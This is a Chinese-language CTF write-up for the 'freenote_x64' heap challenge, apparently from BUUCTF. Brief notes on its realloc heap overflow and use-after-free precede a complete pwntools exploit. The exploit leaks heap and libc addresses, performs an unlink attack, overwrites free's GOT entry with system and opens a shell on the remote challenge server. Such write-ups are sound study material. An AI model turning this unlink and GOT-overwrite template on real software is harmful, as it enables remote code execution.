只能申请unsorted bin大小下的unlink

IDA看一下，可以发现edit里面有任意堆溢出的情况（realloc造成堆溢出）

然后free里面有UAF漏洞

然后几个注意的点，unlink直接可以模板化

1，泄漏地址 包括libc或者存放heap pointer的地址

2，unlink，伪造谁用谁的指针来unlink

3，修改heap为got指针也可以泄漏libc

exp

1 #coding:utf-8
2 '''
3 author: lemon
4 time:
5 libc:
6 python version:
7 '''
8
9 from pwn import *
10 from LibcSearcher import *
11
12 local = 0
13
14 binary = "./freenote_x64"
15
16 if local == 1:
17 p = process(binary)
18 else:
19 p = remote("node3.buuoj.cn",29231)
20
21 def dbg():
22 context.log_level = 'debug'
23
24 context.terminal = ['tmux','splitw','-h']
25
26 def add(size,content):
27 p.sendlineafter('Your choice:','2')
28 p.sendlineafter('Length of new note: ',str(size))
29 p.sendafter('Enter your note:',content)
30
31 def free(index):
32 p.sendlineafter('Your choice: ','4')
33 p.sendlineafter('Note number: ',str(index))
34
35 def show():
36 p.sendlineafter('Your choice: ','1')
37
38 def edit(index,size,content):
39 p.sendlineafter('Your choice: ','3')
40 p.sendlineafter('Note number: ',str(index))
41 p.sendlineafter('Length of note: ',str(size))
42 p.sendafter('Enter your note: ',content)
43
44 add(0x80,0x80 * 'a') # chunk 0
45 add(0x80,0x80 * 'a') # chunk 1
46 add(0x80,0x80 * 'a') # chunk 2
47 add(0x80,0x80 * 'a') # chunk 3
48 add(0x80,0x80 * 'a') # chunk 4
49
50 edit(4,len("/bin/sh\x00"),"/bin/sh\x00")
51
52 #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
53
54 print "unlink前先泄漏出堆的基地址"
55
56 free(3)
57 free(1)
58
59 payload = 0x90 * 'a'
60 edit(0,len(payload),payload)
61 show()
62 p.recvuntil(0x90 * 'a')
63 #heap = u64(p.recv(6) + '\x00\x00')
64 heap_0 = u64(p.recvuntil('\x0a',drop = True) + '\x00\x00\x00\x00') - 0x19a0
65 print "[*] heap:",hex(heap_0)
66 heap_4 = heap_0 + 0x1a40
67
68
69 print "unlink"
70
71 fd = heap_0 - 0x18
72 bk = heap_0 - 0x10
73
74 payload = p64(0) + p64(0x80)
75 payload += p64(fd) + p64(bk)
76 payload = payload.ljust(0x80,'\x00')
77 payload += p64(0x80) + p64(0x90)
78 edit(0,len(payload),payload)
79
80 free(1)
81
82 print "leak libc"
83
84 elf = ELF('./freenote_x64')
85 free_got = elf.got['free']
86 print "[*] free:",hex(free_got)
87
88 payload = p64(2) + p64(1) + p64(0x8) + p64(free_got) #chunk0 size改为0x8
89 payload += p64(0) * 9 + p64(1) + p64(8) + p64(heap_4)
90 payload = payload.ljust(0x90,'\x00')
91 edit(0,len(payload),payload)
92 show()
93 free = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
94
95 # libc_base = free - libc.sym['free']
96 # system = libc_base + libc.sym['system']
97
98 libc = LibcSearcher('free',free)
99 libc_base = free - libc.dump('free')
100 system = libc_base + libc.dump('system')
101
102 payload = p64(system)
103 edit(0,len(payload),payload)
104
105 #gdb.attach(p)
106 p.interactive()